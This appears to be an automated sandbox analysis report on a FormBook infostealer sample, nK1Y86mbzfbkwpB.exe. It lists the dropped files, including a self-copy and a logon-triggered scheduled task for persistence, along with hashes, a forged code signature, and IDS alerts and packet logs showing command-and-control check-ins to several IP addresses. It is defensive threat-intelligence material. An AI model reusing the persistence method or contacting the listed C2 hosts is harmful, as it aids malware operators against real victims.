                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\nK1Y86mbzfbkwpB.exe.log

                                  Download File
                                  Process:C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):1216
                                  Entropy (8bit):5.34331486778365
                                  Encrypted:false
                                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                  MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                  SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                  SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                  SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                  Malicious:true
                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                  Download File
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):2232
                                  Entropy (8bit):5.3797706053345555
                                  Encrypted:false
                                  SSDEEP:48:fWSU4xympgv4RIoUP7gZ9tK8NPZHUx7u1iMugeC/ZPUyus:fLHxv2IfLZ2KRH6Oug8s
                                  MD5:9FF3AC33DFACF1D94AB100EAED9F43DF
                                  SHA1:EFE2AD786E0EE6208CE0353B5E1B3BF530C37508
                                  SHA-256:A94507C64061985F19C9C30947B00BC871FA8754D885979B5127094AA46D794D
                                  SHA-512:E2166B321C3546C88698F6B781FEF640E394890E53D43C75EA3A8AED0FA934BC3C2B8DA816296C9BE04947374C1CB87B84FCEF535EED45B44AED7854E5CAD6FA
                                  Malicious:false
                                  Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                  C:\Users\user\AppData\Local\Temp\023115

                                  Download File
                                  Process:C:\Windows\SysWOW64\runas.exe
                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                  Category:dropped
                                  Size (bytes):196608
                                  Entropy (8bit):1.1239949490932863
                                  Encrypted:false
                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                  MD5:271D5F995996735B01672CF227C81C17
                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                  Malicious:false
                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_exqmpdvg.f4e.ps1

                                  Download File
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hii4lybw.tl4.ps1

                                  Download File
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jzibtdf4.c5f.psm1

                                  Download File
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u02vfqjm.0z2.psm1

                                  Download File
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\tmp100A.tmp

                                  Download File
                                  Process:C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe
                                  File Type:XML 1.0 document, ASCII text
                                  Category:dropped
                                  Size (bytes):1594
                                  Entropy (8bit):5.089490276484582
                                  Encrypted:false
                                  SSDEEP:24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtL89X5h:cge7QYrFdOFzOzN33ODOiDdKrsuTQ9/v
                                  MD5:1391CC79937AD9227EA1212704BC3B5E
                                  SHA1:68C8809EF6299E88A3EC72FF2D724A7466793A8F
                                  SHA-256:B92F0D44198CE77279C264AF37127EA9AB6DAB448CD083217DC9DA64C481C64A
                                  SHA-512:89610C132ED8FF647378F4418E9D05AE1A4D00FB5D7AFCE57E1378BC8BCE8CC2BF47A585776CC63925930B85FC091D4A605E5B567FB7F9F0BE2EDB2354FAE22C
                                  Malicious:true
                                  Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run

                                  C:\Users\user\AppData\Local\Temp\tmp3545.tmp

                                  Download File
                                  Process:C:\Users\user\AppData\Roaming\GDhinOc.exe
                                  File Type:XML 1.0 document, ASCII text
                                  Category:dropped
                                  Size (bytes):1594
                                  Entropy (8bit):5.089490276484582
                                  Encrypted:false
                                  SSDEEP:24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtL89X5h:cge7QYrFdOFzOzN33ODOiDdKrsuTQ9/v
                                  MD5:1391CC79937AD9227EA1212704BC3B5E
                                  SHA1:68C8809EF6299E88A3EC72FF2D724A7466793A8F
                                  SHA-256:B92F0D44198CE77279C264AF37127EA9AB6DAB448CD083217DC9DA64C481C64A
                                  SHA-512:89610C132ED8FF647378F4418E9D05AE1A4D00FB5D7AFCE57E1378BC8BCE8CC2BF47A585776CC63925930B85FC091D4A605E5B567FB7F9F0BE2EDB2354FAE22C
                                  Malicious:false
                                  Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run

                                  C:\Users\user\AppData\Roaming\GDhinOc.exe

                                  Download File
                                  Process:C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe
                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Category:dropped
                                  Size (bytes):735752
                                  Entropy (8bit):7.977107140880606
                                  Encrypted:false
                                  SSDEEP:12288:S2rlAypLC3l8TrfKYZ0kopTFVoik+7dlH/C/o0p2f1i+FCbZ/RLrB4x42f2RLkR:PAyp+szzCpTFiikudlH/25p2fFM/RLrA
                                  MD5:3BFCA4BFD7CDB0F712E4D362E3B320FF
                                  SHA1:E5B837EE1DD3F31B9685216B9306AB4A7878421E
                                  SHA-256:5E8D9CEC59C261AD6E67689490CDD741D56C682CBE9A4C90668F77FFB6F5CB05
                                  SHA-512:D5881C10B56355BC73696D578B4A8C07FF135CA777D8B9DD5B575F9DAB51D3D931C8D41BA9763F78308E95EB177B949C4781B24F892800AAA0A09CF0FEEE9A77
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  • Antivirus: ReversingLabs, Detection: 53%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...r6.f..............0.................. ... ....@.. .......................`............@.................................p...O.... ...................6...@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H........B..|.......D...hq..............................................V.(......}......}....*...0...........{.....X....1.....*..|..........o....r...p.|..........o....(....*....0...........s....}.....(.....s....}.....s....}.........(....(....o.....+_.o...............(....(....o.....+..o...........{......s....o.....o....-....u........,...o......o....-....u........,...o.....*......_.*.........<.k........0..7........o ....+...(!.....{.....o......("...-...........o.....*.........

                                  C:\Users\user\AppData\Roaming\GDhinOc.exe:Zone.Identifier

                                  Download File
                                  Process:C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):26
                                  Entropy (8bit):3.95006375643621
                                  Encrypted:false
                                  SSDEEP:3:ggPYV:rPYV
                                  MD5:187F488E27DB4AF347237FE461A079AD
                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                  Malicious:true
                                  Preview:[ZoneTransfer]....ZoneId=0

                                  Static File Info

                                  General

                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Entropy (8bit):7.977107140880606
                                  TrID:
                                  • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                  • Win32 Executable (generic) a (10002005/4) 49.97%
                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                  • DOS Executable Generic (2002/1) 0.01%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:nK1Y86mbzfbkwpB.exe
                                  File size:735'752 bytes
                                  MD5:3bfca4bfd7cdb0f712e4d362e3b320ff
                                  SHA1:e5b837ee1dd3f31b9685216b9306ab4a7878421e
                                  SHA256:5e8d9cec59c261ad6e67689490cdd741d56c682cbe9a4c90668f77ffb6f5cb05
                                  SHA512:d5881c10b56355bc73696d578b4a8c07ff135ca777d8b9dd5b575f9dab51d3d931c8d41ba9763f78308e95eb177b949c4781b24f892800aaa0a09cf0feee9a77
                                  SSDEEP:12288:S2rlAypLC3l8TrfKYZ0kopTFVoik+7dlH/C/o0p2f1i+FCbZ/RLrB4x42f2RLkR:PAyp+szzCpTFiikudlH/25p2fFM/RLrA
                                  TLSH:ABF423C08E6C9553CEBBAFB0529B550417B371771C20E6816CDA50DB3EE7BA40B69B0B
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...r6.f..............0.................. ... ....@.. .......................`............@................................

                                  File Icon

                                  Icon Hash:1ec7e8e4c4ec5065

                                  Static PE Info

                                  General

                                  Entrypoint:0x4b05c2
                                  Entrypoint Section:.text
                                  Digitally signed:true
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x66973672 [Wed Jul 17 03:11:46 2024 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:4
                                  OS Version Minor:0
                                  File Version Major:4
                                  File Version Minor:0
                                  Subsystem Version Major:4
                                  Subsystem Version Minor:0
                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                  Authenticode Signature

                                  Signature Valid:false
                                  Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                  Signature Validation Error:The digital signature of the object did not verify
                                  Error Number:-2146869232
                                  Not Before, Not After
                                  • 13/11/2018 01:00:00 09/11/2021 00:59:59
                                  Subject Chain
                                  • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                  Version:3
                                  Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                  Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                  Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                  Serial:7C1118CBBADC95DA3752C46E47A27438

                                  Entrypoint Preview

                                  Instruction
                                  jmp dword ptr [00402000h]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al

                                  Data Directories

                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xb05700x4f.text
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xb20000x1994.rsrc
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0xb04000x3608
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xb40000xc.reloc
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                  Sections

                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  .text0x20000xae5c80xae600361b940093524755bfaa610d0fc4043bFalse0.9704511088709677data7.983402866122095IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  .rsrc0xb20000x19940x1a00a4ab314bb07883f412435346a1658c7cFalse0.7723858173076923data7.075257385662227IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .reloc0xb40000xc0x2007bfbb5c32e18cc0299b190e1e26d04c7False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                  Resources

                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                  RT_ICON0xb21000x12bfPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9020629297770368
                                  RT_GROUP_ICON0xb33d00x14data1.05
                                  RT_VERSION0xb33f40x3a0data0.41810344827586204
                                  RT_MANIFEST0xb37a40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                  Imports

                                  DLLImport
                                  mscoree.dll_CorExeMain

                                  Network Behavior

                                  Snort IDS Alerts

                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                  07/17/24-19:00:53.652505TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M26390780192.168.2.6162.159.134.42
                                  07/17/24-18:59:57.073970TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M26389380192.168.2.6185.179.189.181
                                  07/17/24-19:00:40.312082TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M26390280192.168.2.613.248.169.48
                                  07/17/24-19:00:26.031224TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M26389880192.168.2.6172.96.191.69

                                  Suricata IDS Alerts

                                  TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                  2024-07-17T19:00:35.621547+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M36390080192.168.2.613.248.169.48
                                  2024-07-17T19:00:52.335086+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M36390580192.168.2.6162.159.134.42
                                  2024-07-17T19:00:47.382097+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M36390380192.168.2.6162.159.134.42
                                  2024-07-17T19:01:01.582855+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M36390880192.168.2.685.159.66.93
                                  2024-07-17T19:00:38.233207+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M36390180192.168.2.613.248.169.48
                                  2024-07-17T19:00:32.577007+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M36389980192.168.2.613.248.169.48
                                  2024-07-17T19:00:19.259253+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M36389580192.168.2.6172.96.191.69
                                  2024-07-17T19:00:54.774305+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M26390780192.168.2.6162.159.134.42
                                  2024-07-17T19:00:40.778213+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M26390280192.168.2.613.248.169.48
                                  2024-07-17T18:59:57.833169+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M26389380192.168.2.6185.179.189.181
                                  2024-07-17T19:01:04.183883+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M36390980192.168.2.685.159.66.93
                                  2024-07-17T19:00:21.843720+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M36389680192.168.2.6172.96.191.69
                                  2024-07-17T19:00:49.815005+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M36390480192.168.2.6162.159.134.42
                                  2024-07-17T19:00:54.774305+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M56390780192.168.2.6162.159.134.42
                                  2024-07-17T19:00:40.778213+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M56390280192.168.2.613.248.169.48
                                  2024-07-17T19:00:26.999460+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M56389880192.168.2.6172.96.191.69
                                  2024-07-17T18:59:57.833169+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M56389380192.168.2.6185.179.189.181
                                  2024-07-17T19:00:24.415757+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M36389780192.168.2.6172.96.191.69
                                  2024-07-17T19:00:26.999460+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M26389880192.168.2.6172.96.191.69

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Jul 17, 2024 18:59:57.052675009 CEST6389380192.168.2.6185.179.189.181
                                  Jul 17, 2024 18:59:57.057775974 CEST8063893185.179.189.181192.168.2.6
                                  Jul 17, 2024 18:59:57.057858944 CEST6389380192.168.2.6185.179.189.181
                                  Jul 17, 2024 18:59:57.073970079 CEST6389380192.168.2.6185.179.189.181
                                  Jul 17, 2024 18:59:57.079067945 CEST8063893185.179.189.181192.168.2.6
                                  Jul 17, 2024 18:59:57.832782030 CEST8063893185.179.189.181192.168.2.6
                                  Jul 17, 2024 18:59:57.833019018 CEST8063893185.179.189.181192.168.2.6
                                  Jul 17, 2024 18:59:57.833050966 CEST8063893185.179.189.181192.168.2.6
                                  Jul 17, 2024 18:59:57.833086014 CEST8063893185.179.189.181192.168.2.6
                                  Jul 17, 2024 18:59:57.833121061 CEST8063893185.179.189.181192.168.2.6
                                  Jul 17, 2024 18:59:57.833153963 CEST8063893185.179.189.181192.168.2.6
                                  Jul 17, 2024 18:59:57.833168983 CEST6389380192.168.2.6185.179.189.181
                                  Jul 17, 2024 18:59:57.833188057 CEST8063893185.179.189.181192.168.2.6
                                  Jul 17, 2024 18:59:57.833224058 CEST8063893185.179.189.181192.168.2.6
                                  Jul 17, 2024 18:59:57.833235979 CEST6389380192.168.2.6185.179.189.181
                                  Jul 17, 2024 18:59:57.833235979 CEST6389380192.168.2.6185.179.189.181
